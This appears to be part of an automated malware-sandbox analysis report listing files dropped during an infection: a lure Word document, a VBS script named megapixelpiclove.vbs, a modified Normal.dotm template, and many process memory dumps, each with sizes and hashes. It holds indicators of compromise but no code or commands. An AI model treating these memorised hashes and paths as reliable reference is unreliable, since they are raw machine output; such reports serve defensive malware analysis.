2edbd21b95ccb51287402843192a73a73c32a1e2

SHA256
43b862b8c7e423924471478c63bf44f7ef7933523768167130504e65f77146b4

SHA512
4a74f6fd3dec1722a6dfe32cd94f0c1697a684040169e3d01bd284c3c1382bc94c884e428182c476a9cd18db775caaafaecf788c4dcfc390d77f5fa00bfe2127

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
16be61931ca2f6cd5b45dc6b67ae4339

SHA1
64a9a3c956086e7dd701f611823d6153078ff490

SHA256
bdd4f79833101b00fbda3ef6488c7c4540b12a901f924485057731c5c3b78bab

SHA512
918967c7ffb5a7da71eb7ab14521765e13e66e6c443aeb761ce3359409d7e6705c44541a91265849640bd762ba0bc48f28f2ec4e5018ca63381ade28aa83537f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
90a3b8100dcdc423637e5a6b7bf7bada

SHA1
b5260122a838b385b5aa3deab4d2014b0bec5fea

SHA256
d688ba595d2a56148d48145199481ab89889a25e1d3f65b23a0a6b8ccf270bde

SHA512
eadfb11b47c143e96a209cde731d54a983d76354b61a317d741883e532f65ac1bc03843944b9c1904e6f26d0bcaa837e11703cef07d95f46c05b8395f7405d0f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
deafd5ec34cde8f09ae54ea94fee8fb0

SHA1
373965ec719818df6bbb2fe5ac1866b340200f8b

SHA256
02a60a92f253994c1705b9d1e54aecc0c7bf196c8f297125863e69d9ed747abd

SHA512
c7a180770490981b20d0b93cba3b301eb2dd7c6e230d326a6bbdd4b17fea57b95364c89adcf32c36fca1a5878980afa3a65a67fd095c1f311f26f75858c9e7f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
fa70df90d585317f4d1c0298359ab1c5

SHA1
512227ce5b3d4eb914030e9f910e6fc45885a4e0

SHA256
d617b8b64cce4d936af197f0c437630e6f7dca1ed16b8f1a39b61c82264f1a21

SHA512
2da6726c805161a8da2bca1419b1c0c86966300bf227eaf37eacca117db321c084cf596d59f07b749b48f8409324dd27b251ed46930dfd87fd6479832fadca69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{A4C3346D-C582-4C1F-AC85-5C3A7E1EAA6B}.FSD

Filesize
128KB

MD5
50f1032633f2f602dea7bb1cf0a00b1d

SHA1
8e7e9199a2585f745da8f9dc19641f3a753e45f5

SHA256
244860e90d5785d742ac767d7b65aae4a99723bc4045532d9bd18470fce562ed

SHA512
ab689b427371abc277d94dc28cd3156694eb64d0f7d931ea13f4ad905d36d6bede886cdd35830664e843cac6204dc701eb45982c60a46d4b967cf87542decded

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DOODS0NO\macbookproloverkissedeachotherstohanldhowamaclovercanbeatanothermacloverwithallmyheartshekissedtheperson____withentireprocesskissoflove[1].doc

Filesize
65KB

MD5
d36738689697fff4cd6dd39dcd065aee

SHA1
dc8e8a4988987f7c8b6d628597429ffe9b398056

SHA256
989d32416fa41d152d4db47469c9cbc7a35c50c72b0d3b52f5781709227896b3

SHA512
4217caf74242412f7dc37cd3dc62900514a3206456b0abf18ea264a4b3938ddaa96e5c230cf60654dcab74b8ecf824f06506cd3e5332ad5be1763fbeb78099d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar284E.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\ykwudghzmytsijxxy

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\{4406DAED-E084-4D07-BD87-060FEB1CC18E}

Filesize
128KB

MD5
8f6a1dcd9d771cb89fdc30f0397d9631

SHA1
51e42f9f25f6f6518dcf69b594f7ac3accc28686

SHA256
ddf39427e3646ce633316ac9c558aecbb50df59b14216fc292a7fd9c9b5ad089

SHA512
4237ccb8eb7c4c75c8f1a4240471702551aafcee149d64366bbc84ae291f0558347ddf914d3f20ede4f3f9682936002fb98e0991dc37d603fbf5c124fa0eeb31

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
16078749ba2a38050baf7b3f88a933c9

SHA1
1c0276f02ac5a61134335ce40e920db3fd357fda

SHA256
5a26822ec99f7e535602cd8d4d56485ff9a5c9d17da00bb84bc44dfcb653875a

SHA512
4bc042a11070c9953eb1807b96d2391ddbdda0a6c43e87fb7ab36a994000b070feac01bc138433687b408b5a4dc9adcdbde81befedc30ca5845daf99951b3600

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4MMKTYHY4GNT91LOVVDI.temp

Filesize
7KB

MD5
4bfe37bd5fe085e72c6e8a15ffaaafb6

SHA1
2d74a44c70ff364c85d3424ec1f2580a9d1cb24f

SHA256
03198c672406b1375e6b11b2b9e6952542b7c12cdf2f54159e97a2a31a1e5ed6

SHA512
524e656c25bdd1ba7df920131ed936eeec191f784b2e6c96f716d12dd36dec12ed5f4dd601b2f35804c2037e94478934baedd7fc347073a22e80b12ce3b89318

Download Submit
C:\Users\Admin\AppData\Roaming\megapixelpiclove.vbs

Filesize
3KB

MD5
a095815e104c84004544e0aa3da0976e

SHA1
f212cf6da02a3ab33582d0001a1a6eac7857f6d6

SHA256
a246ece65c385cb71161bfe6f3d6d102f04a86990938268fc2b8e6c77a104426

SHA512
2097984325179ec833278c38baef1f5a38ed5e209c90077152ee5505980ff3ed83ce90ae0abdd9ecc1057b4adeab70dc0feda7ca0e215c9c8ace892531b2596f

Download Submit
memory/1188-365-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-362-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-419-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-409-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-408-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-420-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1188-369-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-411-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1188-368-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-367-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-366-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-410-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-363-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-416-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1188-341-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-359-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-357-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-355-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1188-354-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-352-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-350-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-348-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-347-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-345-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1188-343-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1272-397-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1272-390-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1272-400-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1272-383-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1272-395-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1272-399-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1272-398-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1448-382-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1448-417-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1448-394-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1448-377-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1448-388-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1448-396-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1708-332-0x0000000003000000-0x0000000003040000-memory.dmp

Filesize
256KB

Download
memory/1708-328-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/1708-330-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/1708-334-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/1708-329-0x0000000003000000-0x0000000003040000-memory.dmp

Filesize
256KB

Download
memory/1824-405-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1824-384-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1824-376-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1824-372-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1824-389-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1824-391-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2088-449-0x00000000729CD000-0x00000000729D8000-memory.dmp

Filesize
44KB

Download
memory/2088-1-0x00000000729CD000-0x00000000729D8000-memory.dmp

Filesize
44KB

Download
memory/2088-178-0x00000000729CD000-0x00000000729D8000-memory.dmp

Filesize
44KB

Download
memory/2088-114-0x00000000030C0000-0x00000000030C2000-memory.dmp

Filesize
8KB

Download
memory/2088-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2460-292-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/2460-364-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/2460-336-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/2460-335-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/2460-291-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/2460-293-0x0000000002B00000-0x0000000002B40000-memory.dmp

Filesize
256KB

Download
memory/2484-294-0x00000000729CD000-0x00000000729D8000-memory.dmp

Filesize
44KB

Download
memory/2484-446-0x00000000729CD000-0x00000000729D8000-memory.dmp

Filesize
44KB

Download
memory/2484-109-0x000000002FA31000-0x000000002FA32000-memory.dmp

Filesize
4KB

Download
memory/2484-111-0x00000000729CD000-0x00000000729D8000-memory.dmp

Filesize
44KB

Download
memory/2484-113-0x0000000003610000-0x0000000003612000-memory.dmp

Filesize
8KB

Download
memory/2700-302-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/2700-340-0x0000000002E00000-0x0000000002E40000-memory.dmp

Filesize
256KB

Download
memory/2700-303-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/2700-304-0x0000000002E00000-0x0000000002E40000-memory.dmp

Filesize
256KB

Download
memory/2700-301-0x0000000002E00000-0x0000000002E40000-memory.dmp

Filesize
256KB

Download
memory/2700-338-0x0000000002E00000-0x0000000002E40000-memory.dmp

Filesize
256KB

Download
memory/2700-300-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/2700-337-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download
memory/2700-305-0x0000000002E00000-0x0000000002E40000-memory.dmp

Filesize
256KB

Download
memory/2700-339-0x0000000002E00000-0x0000000002E40000-memory.dmp

Filesize
256KB

Download
memory/2700-360-0x000000006A4D0000-0x000000006AA7B000-memory.dmp

Filesize
5.7MB

Download